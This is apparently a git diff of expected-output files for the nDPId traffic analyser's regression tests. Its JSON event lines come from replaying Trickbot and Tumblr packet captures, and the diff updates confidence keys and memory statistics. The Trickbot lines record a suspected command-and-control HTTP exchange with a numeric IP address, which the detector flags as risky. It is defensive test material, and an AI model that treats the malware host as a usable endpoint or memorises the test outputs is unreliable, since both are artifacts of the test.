-01240{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1609266107551,"flow_last_seen":1609266108728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1358,"flow_tot_l4_payload_len":2635,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1609266108728,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":200,"content_type":"text\/html","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}} -01038{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":74,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":74,"flow_first_seen":1609266107551,"flow_last_seen":1609266115947,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":57990,"flow_avg_l4_payload_len":783,"midstream":0,"thread_ts_msec":1609266115947,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +01104{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609266107551,"flow_last_seen":1609266107797,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1609266107797,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}} +01240{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1609266107551,"flow_last_seen":1609266108728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1358,"flow_tot_l4_payload_len":2635,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1609266108728,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":200,"content_type":"text\/html","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}} +01038{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":74,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":74,"flow_first_seen":1609266107551,"flow_last_seen":1609266115947,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":57990,"flow_avg_l4_payload_len":783,"midstream":0,"thread_ts_msec":1609266115947,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":74,"source":"trickbot.pcap","alias":"nDPId-test","packets-captured":74,"packets-processed":74,"total-skipped-flows":0,"total-l4-payload-len":57990,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1609266115947} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 74/74 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871824 bytes -~~ total memory freed........: 5871824 bytes -~~ total allocations/frees...: 118195/118195 +~~ total memory allocated....: 6005458 bytes +~~ total memory freed........: 6005458 bytes +~~ total allocations/frees...: 120957/120957 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 456 chars ~~ json string max len.......: 1245 chars diff --git a/test/results/tumblr.pcap.out b/test/results/tumblr.pcap.out index 469a0a93b..f2f2c18f9 100644 --- a/test/results/tumblr.pcap.out +++ b/test/results/tumblr.pcap.out @@ -10,15 +10,15 @@ 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605292102678,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102678,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdQHZ9A6UTj6g1gBALxQp7AAABAQgKwt2UBql09U8="} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7580000,"flow_min_l4_payload_len":664,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":664,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605292103804,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":750,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":750,"pkt_l4_len":696,"thread_ts_msec":1605292103804,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YArgGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziFnW6Ce2BgBgB9Z0sAAABAQgKOMLyjsLdWyEXAwMCkwAAAAAAAAAEyttPIBHYl6fl6+wxakteQia67zuCx64sVbYiAEMKI1LRZB2ZjjRACezRfqMgcw8Wk8Ja+jFsbTh6PPGiWyRnZCafAJvoLbr\/QbtaCfYNT07cM7gv8MAYjagAz2\/uUXvHhHXYjVHplnNsW6sWSYWdjj7pK3cCYJyTWWk8KcaWVSPm5FJowuyKrEBg\/xvy4liO6V1qSsclVnGU5uOkFVqkiQyVPIXxSNOn3SjKKoV+GRhNjLSyOjDMf9ZrVDwqHvTDUwRZgkE5k6+v4Ngk9WrnV1ax1ubCqnHoIel2EK4gbfVvolwb83\/d3YNFV8lq1e+SHlYke+eJRKzjNIOw4b4Y36hRm5\/D2hks6V9vGkg6sSDzHRzniE1V4ce1mOtmNnefjf42UQc2HkOmWCkUVtMokEc166qSRXnlIooPlIQBw2b0stTzXYA2D5SN\/BALZmedX1SrmcVBJ4DrMf\/xHLEmuGaRjzLDgXIUB\/jHR45QJ7tyaECd\/R1pWTx+wCe3sS0fZlg4mB6GzVlIgWc0sXiXzk4KusTcJBlT6WCFzmZVXwOxGhq4mx\/Ar34HImolLoUFN3W4QPP1XuhLobsRn8+uu1UjAIOgrakq2nUZ7wxPjCRa6GR8HhsJaaSV8kQKCsWaODSJH8qsgcj27KMOqJKDEttTsUUejaBrXacD1ursBsQeG6kxeWCpc+pc+B6lF82QSaY+dqDc0x6adlVhzh25sn9xUc5gttNEqsRpcCwXleCFl5slq6Eo208ayh44XAy4\/3sSIcuuXZecriDdQNtCpH0D9WnZpbvC6F0uUd8YgEMLKpbVgkphXTjpgJPqNLHR1Jtsu8T0zduHUyA8I2rMdecA7vfO5m6vB6zg"} -00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7580000,"flow_min_l4_payload_len":664,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":664,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7580000,"flow_min_l4_payload_len":664,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":664,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00614{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7580000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01367{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605292103804,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":730,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":730,"pkt_l4_len":676,"thread_ts_msec":1605292103804,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAqQGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPNREQMJOagBgB9f9ZAAABAQgKI0OBn8LdXfIXAwMCf+a7XKOkxtVKJI04EV4D3mT6IiNw5ZdwpK\/ctvLby5AnUtCRp1wz9iXgvd8CBQl59Ed1wqXQfvbQcvgr9o4GGMRVH8BPyBiK9wAHxfoair+VUOV+cUyNlvDKwuPaUh\/47DlY44LAL0vv9eo4G0vPSmnyuohMST6JkC52HBED7hDgCc5lbkYutM3P7xGL1Z5MrmmzLXVyM4doUQOUayCKfyqRux1EiZDMeHsdoHvinwuW98Zns+5LqMwEKiz9\/ZA1Iu594xbEmeMockAnjj3HmV8YsDERU2TzTk3sWn0ZhKp12Rdx11cVSOnv1ddUqmkYpF6VPIBgfZdY0+3WEYNWwp9gOeZ1SPKEW1sZa\/MZbqxYU+ge0aUNP414S6YsDr4wWnXY\/hrIPt4hdVJid3p8HC+BYX8NVuisAelA3CsslL+yrlEZs\/QElNY2EIBitMqJSsgpwlduIlvcGoykV3DYfMjS3smQ0\/HaV+vGuY59BD+HYzkVJoRFJ5+AoB\/9kz8MrwgQrulG8+mXwGs2Tz+e0pxggDcl3iaCIQO5yUqOapIz\/jo8gXQAUjpsoKRzsKjRY\/OKBL3cj5DbujlngZrs+3yRDxMp\/A8kmIYDSMjyy21do9HW47erPa0WwNSepOx56UCCZyny26AleUHgV47LLX+Hh0DKxyVNOlUl474o9ZULR18pA1FtXPbynHGzdWF0peqNAJdGXSpxCnSDK+dkiaw9fmAlL\/EwEDJgbnaFqYBoa1wzZSNmUTmn9uQt7gG5UTLglNz7Gtm2hHwfzEK4uAknhpJOuKuRvE3auX9h725wqrVluU5SCPoyvKwHHRb0nBQK3ngxp6Haaq8pgOXbmw=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7580000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7580000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605292103806,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292103806,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YAE4GQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziGQ26Ce2BgBgB9dicAAABAQgKOMLykMLdWyEXAwMAKQAAAAAAAAAF+jUU1elIEFUi9UepC3cLGnJUpit7lClItBx8Gs+U4NeE"} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605292103807,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103807,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPN5UQMJOagBgB9TxfAAABAQgKI0OBosLdXfIXAwMAIkCDsSUDRd2gtpG1ie0hMvlOrf1SL9AYeSm49w1LAyMVmmo="} 00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103810,"flow_last_seen":1605292103810,"flow_idle_time":7580000,"flow_min_l4_payload_len":382,"flow_max_l4_payload_len":382,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1605292103810,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01015{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1605292103810,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":468,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":468,"pkt_l4_len":414,"thread_ts_msec":1605292103810,"pkt":"qtsDr8lk5EKm5WPyht1gCmLwAZ4GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACYxxWTp5wBu7LtL87ROW\/JgBgB9bw+AAABAQgKM4zEpsLdXIMXAwMBeeuGCWF9Lb0Ci6TEBMXMSCRU5\/ujX\/oVXdGh+BNpGjYWczn5t9MnrcPf0zR8Rsvgek65i+QCA5M9xg538hLyui9336X\/wmAqUKW0ovcGHfVkBbInk26LgYglI5Td\/ssdGWORhYySPbJXLEFtu\/h1mXhj5XU6VyNxU9SBh\/8O12l+trWyWdbANDOIW9SbvtVRvHBRVZmz1ag3okb4Plbrh4Qi4B+G74t5h0\/qMYjiEuZ1+PtpSHBW9OPbPwwcOV4UZ67nf4PG8vUha9JOewT6Ihb4Yfc7EBAGx7VHrcHsn7dvXiF8gTt9bh55AJVAbM2ak8Yu6DoJnJsa+jvwTKddiAxdtJhT3E7fBmbothroFA49N5AzGnFsh4cxhtIWJBj0s+8J1Phi\/75LUnCD0lYbxKIDoOKf0QWR08Jx8MCXKqwRPsjDU42Fi\/URG4BOwibUPBjlxMt8e\/Bx1zwNGX2TOl3lRdKcwrnMTh58G0mfgl41Ox0e5b1fEr4M"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103810,"flow_last_seen":1605292103810,"flow_idle_time":7580000,"flow_min_l4_payload_len":382,"flow_max_l4_payload_len":382,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1605292103810,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103810,"flow_last_seen":1605292103810,"flow_idle_time":7580000,"flow_min_l4_payload_len":382,"flow_max_l4_payload_len":382,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1605292103810,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605292103811,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103811,"pkt":"qtsDr8lk5EKm5WPyht1gCmLwAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACYxxWTp5wBu7LtMUzROW\/JgBgB9W6tAAABAQgKM4zEp8LdXIMXAwMAIinMMkxOhnFjQLjLSAyia+Ge5bjIivBAhB3nTGih+nlOG64="} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605292103882,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292103882,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YAE4GQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziGQ26Ce2BgBgB9dhQAAABAQgKOMLy3MLdWyEXAwMAKQAAAAAAAAAF+jUU1elIEFUi9UepC3cLGnJUpit7lClItBx8Gs+U4NeE"} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605292103890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103890,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPN5UQMJOagBgB9TwMAAABAQgKI0OB9cLdXfIXAwMAIkCDsSUDRd2gtpG1ie0hMvlOrf1SL9AYeSm49w1LAyMVmmo="} @@ -26,54 +26,54 @@ 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292104650,"flow_last_seen":1605292104650,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292104650,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1605292104650,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292104650,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MQoWdXXNVgBAB9YSyAAABAQgKTYTpp8Lc6wE="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605292104716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292104716,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAGj0KsgqAcsBIEmLB5kd7IUo3\/YpAbvdzp1dc1X\/jEKGgBAMSBTRAAABAQgKwt2b\/U1+nj4="} -00673{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":57,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292103810,"flow_last_seen":1605292105112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12081,"flow_avg_l4_payload_len":377,"midstream":1,"thread_ts_msec":1605292105112,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00673{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":57,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292103810,"flow_last_seen":1605292105112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12081,"flow_avg_l4_payload_len":377,"midstream":1,"thread_ts_msec":1605292105112,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105170,"flow_last_seen":1605292105170,"flow_idle_time":7580000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1605292105170,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1605292105170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":246,"pkt_l4_len":192,"thread_ts_msec":1605292105170,"pkt":"qtsDr8lk5EKm5WPyht1gDdvHAMAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqZwBuzRq\/HZTRuvUgBgSELhfAAABAQgKdG+lysLdLW8XAwMAm7+VUv5v3n1cEKhvA7Obmk7hW69laavu9OZNOdP5v2aiE9LYEKQeHffn7vm6VstuW5LB+GPd1bdCCYxPrQ8cpXXvSrRBde7Ubgvulsw\/eGF6vJKgoYXL5h04lY18ojPm\/cV9tUPretg64t\/hG52\/jXKkQ9+5e1GR1KuJgn1MWQ\/97vN82J\/Jt388ivkqQMfP0T\/jvMqs33Elwytq"} 